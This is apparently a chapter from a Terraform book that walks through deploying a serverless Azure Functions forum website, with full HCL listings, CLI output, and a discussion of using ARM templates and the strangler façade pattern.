Serverless is one of the biggest marketing gimmicks of all time. It seems like everything is marketed as “serverless” despite nobody even being able to agree on what the word means. Serverless definitely does not refer to the elimination of servers; it usually means the opposite since distributed systems often involve many more servers than traditional system design.
One thing that can be agreed on is that serverless is not a single technology; it’s a suite of related technologies sharing two key characteristics:
Pay-as-you-go billing is about paying for the actual quantity of resources consumed rather than pre-purchased units of capacity (i.e. pay for what you use, not what you don’t use). Minimal operational overhead means the cloud provider takes on most or all responsibility for scaling, maintaining, and managing the service.
There are many benefits of choosing serverless, chief of which is that less work is required, but the tradeoff is that you have less control. If on-premises data centers require the most work (and most control) and software as a service (SaaS) requires the least work (and offers the least control), then serverless is between these extremes but edging closer to SaaS (see figure 5.1).
Figure 5.1 Serverless is an umbrella term for technologies ranging between platform as a service (PaaS) and software as a service (SaaS).
In this chapter, we deploy an Azure Functions website with Terraform. Azure Functions is a serverless technology similar to AWS Lambda or Google Cloud Functions, which allows you to run code without worrying about servers. Our web architecture will be similar to what we deployed in chapter 4, but serverless.
This scenario is something I like to call “the two-penny website” because that’s how much I estimate it will cost to run every month. If you can scrounge some coins from between your sofa cushions, you’ll be good for at least a year of web hosting. For most low-traffic web applications, the true cost will likely be even less, perhaps even rounding down to nothing.
The website we will deploy is a ballroom dancing forum called Ballroom Dancers Anonymous. Unauthenticated users can leave public comments that are displayed on the website and stored in a database. The design is fairly simple, making it well suited for use in other applications. A sneak peek of the final product is shown in figure 5.2.
Figure 5.2 Ballroom Dancers Anonymous website
We will use Azure to deploy the serverless website, but it shouldn’t feel any different than deploying to AWS. A basic deployment strategy is shown in figure 5.3.
Figure 5.3 Deploying to Azure is no different from deploying to AWS.
Note If you would like to see an AWS Lambda example, I recommend taking a look at the source code for the pet store module deployed in chapter 11.
Although the website costs only pennies to run, it is by no means a toy. Because it’s deployed on Azure Functions, it can rapidly scale out to handle tremendous spikes in traffic and do so with low latency. It also uses HTTPS (something the previous chapter’s scenario did not) and a NoSQL database, and it serves both static content (HTML/CSS/JS) and a REST API. Figure 5.4 shows an architecture diagram.
Figure 5.4 An Azure function app listens for HTTP requests coming from the internet. When a request is made, it starts a just-in-time web server from source code located in a storage container. All stateful data is stored in a NoSQL database using a service called Azure Table Storage.
Because the code we’re writing is relatively short and cohesive, it’s best to put it all in a single main.tf file instead of using nested modules.
Tip As a rule of thumb, I suggest having no more than a few hundred lines of code per Terraform file. Any more, and it becomes difficult to build a mental map of how the code works. Of course, the exact number is for you to decide.
If we are not going to use nested modules, how should we organize the code so that it’s easy to read and understand? As discussed in chapter 4, organizing code based on the number of dependencies is a sound approach: resources with fewer dependencies are located toward the top of the file and vice versa. This leaves room for ambiguity, especially when two resources have the same number of dependencies.
The idea of organizing by some characteristic other than the number of resource dependencies (henceforth called size) is a common strategy when writing clean Terraform code. The idea is to first group related resources, then sort each group by size, and finally organize the groups so the overall trend is increasing size (see figure 5.5). This makes your code both easy to read and easy to understand.
Figure 5.5 Configuration files should be sorted first by group and then by size. The overall trend is increasing size.
Just as it’s quicker to search for a word in a dictionary than a word-search puzzle, it’s faster to find what you’re looking for when your code is organized in a sensible manner (such as the sorting pattern shown in figure 5.5). I have divided this project into four groups, each serving a specific purpose in the overall application deployment. These groups are as follows:
Resource group—This is the name of an Azure resource that creates a project container. The resource group and other base-level resources reside at the top of main.tf because they are not dependent on any other resource.
Storage container—Similar to an S3 bucket, an Azure storage container stores the versioned build artifact (source code) that will be used by Azure Functions. It serves a dual purpose as the NoSQL database.
Storage blob—This is like an S3 object and is uploaded to the storage container.
Azure Functions app—Anything related to deploying and configuring an Azure Functions app is considered part of this group.
The overall architecture is illustrated in figure 5.6.
Figure 5.6 The project has four main groups, each serving a distinct purpose.
Finally, we need to consider inputs and outputs. There are two input variables: location
and namespace
. location
is used to configure the Azure region, while namespace
provides a consistent naming scheme, as we have seen before. The sole output value is website_url
, which is a link to the final website (see figure 5.7).
Figure 5.7 Overall input variables and output values of the root module
Recall the we need to create four groups:
Before jumping into the code, we need to authenticate to Microsoft Azure and set the required input variables. Refer to appendix B for a tutorial on authenticating to Azure using the CLI method.
After you’ve obtained credentials to Azure, create a new workspace containing three files: variables.tf, terraform.tfvars, and providers.tf. Then insert the contents of the following listing into variables.tf.
variable "location" { type = string default = "westus2" } variable "namespace" { type = string default = "ballroominaction" }
Now we will set the variables; the next listing shows the contents of terraform.tfvars. Technically, we don’t need to set location
or namespace
, since the defaults are fine, but it’s always a good idea to be thorough.
location = "westus2" namespace = "ballroominaction"
Since I expect you to obtain credentials via the CLI login, the Azure provider declaration is empty. If you are using one of the other methods, it may not be.
TIP Whatever you do, do not hardcode secrets in the Terraform configuration. You do not want to accidentally check sensitive information into version control. We discuss how to manage secrets in chapters 6 and 13.
provider "azurerm" { features {} }
Now we’re ready to write the code for the first of the four groups (see figure 5.8). Before we continue, I want to clarify what resource groups are, in case you are not familiar with them.
Figure 5.8 Development roadmap—step 1 of 4
In Azure, all resources must be deployed into a resource group, which is essentially a container that stores references to resources. Resource groups are convenient because if a resource group is deleted, all of the resources it contains are also deleted. Each Terraform deployment should get its own resource group to make it easier to keep track of resources (much like tagging in AWS). Resource groups are not unique to Azure—there are equivalents in AWS (https://docs.aws.amazon.com/ARG/latest/userguide/welcome.html) and Google Cloud (https://cloud.google.com/storage/docs/projects)—but Azure is the only cloud that compels their use. The code for creating a resource group is shown next.
resource "azurerm_resource_group" "default" { name = local.namespace location = var.location }
In addition to the resource group, we want to use the Random provider again to ensure sufficient randomness beyond what the namespace
variable supplies. This is because some resources in Azure must be unique not only in your account but globally (i.e. across all Azure accounts). The code in listing 5.5 shows how to accomplish this by joining var.namespace
with the result of random_string
to effectively create right padding. Add this code before the azurerm_resource_group
resource to make the dependency relationship clear.
resource "random_string" "rand" { length = 24 special = false upper = false } locals { namespace = substr(join("-", [var.namespace, random_string.rand.result]), ➥ 0, 24) ❶ }
❶ Adds a right pad to the namespace variable and stores the result in a local value
We will now use a Azure storage container to store application source code and documents in a NoSQL database (see figure 5.9). The NoSQL database is technically a separate service, known as Azure Table Storage, but it’s really just a NoSQL wrapper around ordinary key-value pairs.
Figure 5.9 Development roadmap—step 2 of 4
Provisioning a container in Azure is a two-step process. First you need to create a storage account, which provides some metadata about where the data will be stored and how much redundancy/data replication you’d like; I recommend sticking with standard values because it’s a good balance between cost and durability. Second, you need to create the container itself. Following is the code for both steps.
resource "azurerm_storage_account" "storage_account" { name = random_string.rand.result resource_group_name = azurerm_resource_group.default.name location = azurerm_resource_group.default.location account_tier = "Standard" account_replication_type = "LRS" } resource "azurerm_storage_container" "storage_container" { name = "serverless" storage_account_name = azurerm_storage_account.storage_account.name container_access_type = "private" }
Note This is the place to add a container for static website hosting in Azure Storage. For this project, it isn’t necessary because Azure Functions will serve the static content along with the REST API (which is not ideal).
One of the things I like best about Azure Functions is that it gives you many different options regarding how you want to deploy your source code. For example, you can do the following:
For this scenario, we’ll use the last method (running from a zip package referenced with a publicly accessible URL) because it allows us to deploy the project with a single terraform apply
command. So now we have to upload a storage blob to the storage container (see figure 5.10).
Figure 5.10 Development roadmap—step 3 of 4
At this point, you may be wondering where the source code zip file comes from. Normally, you would already have it on your machine, or it would be downloaded before Terraform executes as part of a continuous integration / continuous delivery (CI/CD) pipeline. Since I wanted this to work with no additional steps, I’ve packaged the source code zip into a Terraform module, instead.
Remote modules can be fetched from the Terraform Registry with either terraform
init
or terraform
get
. But not only the Terraform configuration is downloaded; everything in those modules is downloaded. Therefore, I have stored the entire application source code in a shim module so that it can be downloaded with terraform
init
. Figure 5.11 illustrates how this was done.
Figure 5.11 Registering a shim module with the Terraform Registry
WARNING Modules can execute malicious code on your local machine by taking advantage of local-exec provisioners. You should always skim the source code of an untrusted module before deploying it.
The shim module is a mechanism for downloading the build artifact onto your local machine. It’s certainly not best practice, but it is an interesting technique, and it’s convenient for our purposes. Add the following code to main.tf to do this.
module "ballroom" { source = "terraform-in-action/ballroom/azure" } resource "azurerm_storage_blob" "storage_blob" { name = "server.zip" storage_account_name = azurerm_storage_account.storage_account.name storage_container_name = azurerm_storage_container.storage_container.name type = "Block" source = module.ballroom.output_path }
We will now write the code for the function app (figure 5.12). I wish I could say it was all smooth sailing from here on out, but sadly, that is not the case. The function app needs to be able to download the application source code from the private storage container, which requires a URL that is presigned by a shared access signature (SAS) token.
Figure 5.12 Development roadmap—step 4 of 4
Lucky for us, there is a data source for producing the SAS token with Terraform (although it is more verbose than it probably needs to be). The code in listing 5.8 creates a SAS token that allows the invoker to read from an object in the container with an expiry date set in 2048 (Azure Functions continuously uses this token to download the storage blob, so the expiry must be set far in the future).
data "azurerm_storage_account_sas" "storage_sas" { connection_string = azurerm_storage_account.storage_account ➥ .primary_connection_string resource_types { service = false container = false object = true } services { blob = true queue = false table = false file = false } start = "2016-06-19T00:00:00Z" expiry = "2048-06-19T00:00:00Z" permissions { read = true ❶ write = false delete = false list = false add = false create = false update = false process = false } }
❶ Read-only permissions to blobs in container storage
Now that we have the SAS token, we need to generate the presigned URL. It would be wonderful if there was a data source to do this, but there is not. It’s kind of a long calculation, so I took the liberty of setting it to a local value for readability purposes. Add this code to main.tf.
locals {
package_url = "https://${azurerm_storage_account.storage_account.name}
➥ .blob.core.windows.
net/${azurerm_storage_container.storage_container.name}/${azurerm_storage_b
lob.storage_blob.name}${data.azurerm_storage_account_sas.storage_sas.sas}"
}
Finally, add the code for creating an azurerm_application_insights
resource (required for instrumentation and logging) and the azurerm_function_app
resource.
resource "azurerm_app_service_plan" "plan" { name = local.namespace location = azurerm_resource_group.default.location resource_group_name = azurerm_resource_group.default.name kind = "functionapp" sku { tier = "Dynamic" size = "Y1" } } resource "azurerm_application_insights" "application_insights" { name = local.namespace location = azurerm_resource_group.default.location resource_group_name = azurerm_resource_group.default.name application_type = "web" } resource "azurerm_function_app" "function" { name = local.namespace location = azurerm_resource_group.default.location resource_group_name = azurerm_resource_group.default.name app_service_plan_id = azurerm_app_service_plan.plan.id https_only = true storage_account_name = azurerm_storage_account.storage_account.name storage_account_access_key = azurerm_storage_account.storage_account ➥ .primary_access_key version = "~2" app_settings = { FUNCTIONS_WORKER_RUNTIME = "node" WEBSITE_RUN_FROM_PACKAGE = local.package_url ❶ WEBSITE_NODE_DEFAULT_VERSION = "10.14.1" APPINSIGHTS_INSTRUMENTATIONKEY = azurerm_application_insights ➥ .application_insights.instrumentation_key TABLES_CONNECTION_STRING = data.azurerm_storage_account_sas ➥ .storage_sas.connection_string ❷ AzureWebJobsDisableHomepage = true } }
❶ Points to the build artifact
❷ Allows the app to connect to the database
We’re in the home stretch! All we have to do now is version-lock the providers and set the output value so that we’ll have an easy link to the deployed website. Create a new file called versions.tf, and insert the following code.
terraform { required_version = ">= 0.15" required_providers { azurerm = { source = "hashicorp/azurerm" version = "~> 2.47" } archive = { source = "hashicorp/archive" version = "~> 2.0" } random = { source = "hashicorp/random" version = "~> 3.0" } } }
The outputs.tf file is also quite simple.
output "website_url" { value = "https://${local.namespace}.azurewebsites.net/" }
For your reference, the complete code from main.tf is shown next.
Listing 5.13 Complete code for main.tf
resource "random_string" "rand" {
length = 24
special = false
upper = false
}
locals {
namespace = substr(join("-", [var.namespace, random_string.rand.result]),
0, 24)
}
resource "azurerm_resource_group" "default" {
name = local.namespace
location = var.location
}
resource "azurerm_storage_account" "storage_account" {
name = random_string.rand.result
resource_group_name = azurerm_resource_group.default.name
location = azurerm_resource_group.default.location
account_tier = "Standard"
account_replication_type = "LRS"
}
resource "azurerm_storage_container" "storage_container" {
name = "serverless"
storage_account_name = azurerm_storage_account.storage_account.name
container_access_type = "private"
}
module "ballroom" {
source = "terraform-in-action/ballroom/azure"
}
resource "azurerm_storage_blob" "storage_blob" {
name = "server.zip"
storage_account_name = azurerm_storage_account.storage_account.name
storage_container_name = azurerm_storage_container.storage_container.name
type = "Block"
source = module.ballroom.output_path
}
data "azurerm_storage_account_sas" "storage_sas" {
connection_string =
azurerm_storage_account.storage_account.primary_connection_string
resource_types {
service = false
container = false
object = true
}
services {
blob = true
queue = false
table = false
file = false
}
start = "2016-06-19T00:00:00Z"
expiry = "2048-06-19T00:00:00Z"
permissions {
read = true
write = false
delete = false
list = false
add = false
create = false
update = false
process = false
}
}
locals {
package_url = "https://${azurerm_storage_account.storage_account.name}
➥ .blob.core.windows.
net/${azurerm_storage_container.storage_container.name}/${azurerm_storage_b
lob.storage_blob.name}${data.azurerm_storage_account_sas.storage_sas.sas}"
}
resource "azurerm_app_service_plan" "plan" {
name = local.namespace
location = azurerm_resource_group.default.location
resource_group_name = azurerm_resource_group.default.name
kind = "functionapp"
sku {
tier = "Dynamic"
size = "Y1"
}
}
resource "azurerm_application_insights" "application_insights" {
name = local.namespace
location = azurerm_resource_group.default.location
resource_group_name = azurerm_resource_group.default.name
application_type = "web"
}
resource "azurerm_function_app" "function" {
name = local.namespace
location = azurerm_resource_group.default.location
resource_group_name = azurerm_resource_group.default.name
app_service_plan_id = azurerm_app_service_plan.plan.id
https_only = true
storage_account_name = azurerm_storage_account.storage_account.name
storage_account_access_key =
azurerm_storage_account.storage_account.primary_access_key
version = "~2"
app_settings = {
FUNCTIONS_WORKER_RUNTIME = "node"
WEBSITE_RUN_FROM_PACKAGE = local.package_url
WEBSITE_NODE_DEFAULT_VERSION = "10.14.1"
APPINSIGHTS_INSTRUMENTATIONKEY = azurerm_application_insights.application_insights.instrumentation_key
TABLES_CONNECTION_STRING =
data.azurerm_storage_account_sas.storage_sas.connection_string
AzureWebJobsDisableHomepage = true
}
}
NOTE Some people like to declare local values all together at the top of the file, but I prefer to declare them next to the resources that use them. Either approach is valid.
We are done with the four steps required to set up the Azure serverless project and are ready to deploy! Run terraform init
and terraform plan
to initialize Terraform and verify that the configuration code is correct:
$ terraform init && terraform plan ... # azurerm_storage_container.storage_container will be created + resource "azurerm_storage_container" "storage_container" { + container_access_type = "private" + has_immutability_policy = (known after apply) + has_legal_hold = (known after apply) + id = (known after apply) + metadata = (known after apply) + name = "serverless" + properties = (known after apply) + resource_group_name = (known after apply) + storage_account_name = (known after apply) } # random_string.rand will be created + resource "random_string" "rand" { + id = (known after apply) + length = 24 + lower = true + min_lower = 0 + min_numeric = 0 + min_special = 0 + min_upper = 0 + number = true + result = (known after apply) + special = false + upper = false } Plan: 8 to add, 0 to change, 0 to destroy. Changes to Outputs: + website_url = (known after apply) _____________________________________________________________________________ Note: You didn't specify an "-out" parameter to save this plan, so Terraform can't guarantee that exactly these actions will be performed if "terraform apply" is subsequently run.
Next, deploy with terraform apply
. The command and subsequent output are shown next.
Warning! You should probably run terraform plan
first. I use terraform apply -auto-approve
here only to save space.
$ terraform apply -auto-approve ... azurerm_function_app.function: Still creating... [10s elapsed] azurerm_function_app.function: Still creating... [20s elapsed] azurerm_function_app.function: Still creating... [30s elapsed] azurerm_function_app.function: Still creating... [40s elapsed] azurerm_function_app.function: Creation complete after 48s [id=/subscriptions/7deeca5c-dc46-45c0-8c4c- 7c3068de3f63/resourceGroups/ballroominaction/providers/Microsoft.Web/sites/ ballroominaction-23sr1wf] Apply complete! Resources: 8 added, 0 changed, 0 destroyed. Outputs: website_url = https://ballroominaction-23sr1wf.azurewebsites.net/
Figure 5.13 Deployed Ballroom Dancers Anonymous website
You can navigate to the deployed website in the browser. Figure 5.13 shows what this will look like.
NOTE It’s surprisingly hard to find simple examples for Azure serverless projects, so I’ve intentionally made the source code minimalistic. Feel free to peruse my work or use it as a template for your own serverless projects. You can find it on GitHub (https://github.com/terraform-in-action/terraform -azure-ballroom) or in the .terraform/modules/ballroom directory.
Don’t forget to call terraform destroy
to clean up! This tears down all the infrastructure provisioned in Azure:
$ terraform destroy -auto-approve ... azurerm_resource_group.default: Still destroying... [id=/subscriptions/7deeca5c-dc46-45c0-8c4c- ...de3f63/resourceGroups/ballroominaction, 1m30s elapsed] azurerm_resource_group.default: Still destroying... [id=/subscriptions/7deeca5c-dc46-45c0-8c4c- ...de3f63/resourceGroups/ballroominaction, 1m40s elapsed] azurerm_resource_group.default: Destruction complete after 1m48s Destroy complete! Resources: 8 destroyed.
Azure Resource Manager (ARM) is Microsoft’s infrastructure as code (IaC) technology that allows you to provision resources to Azure using JSON configuration files. If you’ve ever used AWS CloudFormation or GCP Deployment Manager, it’s a lot like that, so most of the concepts from this section carry over to those technologies. Nowadays, Microsoft is heavily promoting Terraform over ARM, but legacy use cases of ARM still exist. The three cases where I find ARM useful are as follows:
Back in ye olden days, when Terraform was still an emerging technology, Terraform providers didn’t enjoy the same level of support they have today (even for the major clouds). In Azure’s case, many resources were unsupported by Terraform long after their general availability (GA) release. For example, Azure IoT Hub was announced GA in 2016 but did not receive support in the Azure provider until over two years later. In that awkward gap period, if you wished to deploy an IoT Hub from Terraform, your best bet was to deploy an ARM template from Terraform:
resource "azurerm_template_deployment" "template_deployment" { name = "terraform-ARM-deployment" resource_group_name = azurerm_resource_group.resource_group.name template_body = file("${path.module}/templates/iot.json") deployment_mode = "Incremental" parameters = { IotHubs_my_iot_hub_name = "ghetto-hub" } }
This was a way of bridging the gap between what was possible with Terraform and what was possible with ARM. The same held true for unsupported resources in AWS and GCP by using AWS Cloud Formation and GCP Deployment Manager.
As Terraform has matured, provider support has swelled to encompass more and more resources, and today you’d be hard-pressed to find a resource that Terraform doesn’t natively support. Regardless, there are still occasional situations where using an ARM template from Terraform could be a viable strategy for deploying a resource (even if there is a native Terraform resource to do this). Some Terraform resources are just poorly implemented, buggy, or otherwise lacking features, and ARM templates may be a better fit in these circumstances.
It’s likely that before you were using Terraform, you were using some other kind of deployment technology. Let’s assume, for the sake of argument, that you were using ARM templates (or CloudFormation, if you are on AWS). How do you migrate your old systems into Terraform without investing considerable time up front? By using the strangler façade pattern.
The strangler façade pattern is a pattern for migrating a legacy system to a new system by slowly replacing the legacy parts with new parts until the new system completely supersedes the old system. At that point, the old system may be safely decommissioned. It’s called the strangler façade pattern because the new system is said to “strangle” the legacy system until it dies off (see figure 5.14). You’ve probably encountered something like this, as it’s a fairly common strategy, especially for APIs and services that must uphold a service-level agreement (SLA).
Figure 5.14 The strangler facade pattern for migrating ARM to Terraform. You start with a huge ARM template wrapped with an azurerm_template_deployment resource and not much else. Over time, resources are taken out of the ARM template and configured as native Terraform resources. Eventually, you no longer need the ARM template because everything is now a managed Terraform resource.
This applies to Terraform because you can migrate legacy code written in ARM or CloudFormation by wrapping it with an azurerm_template_deployment
or aws _cloudformation_stack
resource. Over time, you can incrementally replace specific resources from the old ARM or CloudFormation Stack with native Terraform resources until you are entirely in Terraform.
The most painful thing about Terraform is that it takes a lot of work to translate what you want into configuration code. It’s usually much easier to point and click around the console until you have what you want and then export that as a template.
Note A number of open source projects aim to address this problem, most notably Terraformer: https://github.com/GoogleCloudPlatform/terraformer. HashiCorp also promises that it will improve imports to natively support generating configuration code from deployed resources in a future release of Terraform.
This is exactly what Azure resource groups let you do. You can take any resource group that is currently deployed, export it as an ARM template file, and then deploy that template with Terraform (see figure 5.15).
Figure 5.15 You can take any resource group that is currently deployed, export it as an ARM template file, and then deploy that template with Terraform.
WARNING Generated ARM templates are not always a 1:1 mapping of what is currently deployed in a resource group. Refer to the Azure ARM documentation for a definitive reference on what is and is not currently supported: https://docs.microsoft.com/en-us/azure/templates.
The beauty (or curse) of this approach is that you can sketch your entire project in the console and deploy it via Terraform without having to write any configuration code (except a small amount of wrapper code). Sometime in the future, if you wanted to, you could then migrate this quick-and-dirty template to native Terraform using the strangler façade pattern mentioned in the previous section. I like to think of this trick as a form of rapid prototyping.
Terraform is an infrastructure as code tool that facilitates serverless deployments with the same ease as deploying anything else. Although this chapter focused on Azure, deploying serverless onto AWS or GCP is analogous. In fact, the first version of this scenario was written for AWS. I switched to create a better setup for the multi-cloud capstone project in chapter 8. If you are a fan of Azure, then I regret to inform you that after chapter 8, we will resume using AWS for the remainder of the book.
The key takeaway from this chapter is that Terraform can solve various problems, but the way you approach designing Terraform modules is always the same. In the next chapter, we continue our discussion of modules and formally introduce the module registry.
Terraform orchestrates serverless deployments with ease. All the resources a serverless deployment needs can be packaged and deployed as part of a single module.
Code organization is paramount when designing Terraform modules. Generally, you should sort by group and then by size (i.e. number of resource dependencies).
Any files in a Terraform module are downloaded as part of terraform
init
or terraform
get
. Be careful, because this can lead to downloading and running potentially malicious code.
Azure Resource Manager (ARM) is an interesting technology that can be combined with Terraform to patch holes in Terraform or even allow you to skip writing Terraform configuration entirely. Use it sparingly, however, because it’s not a panacea.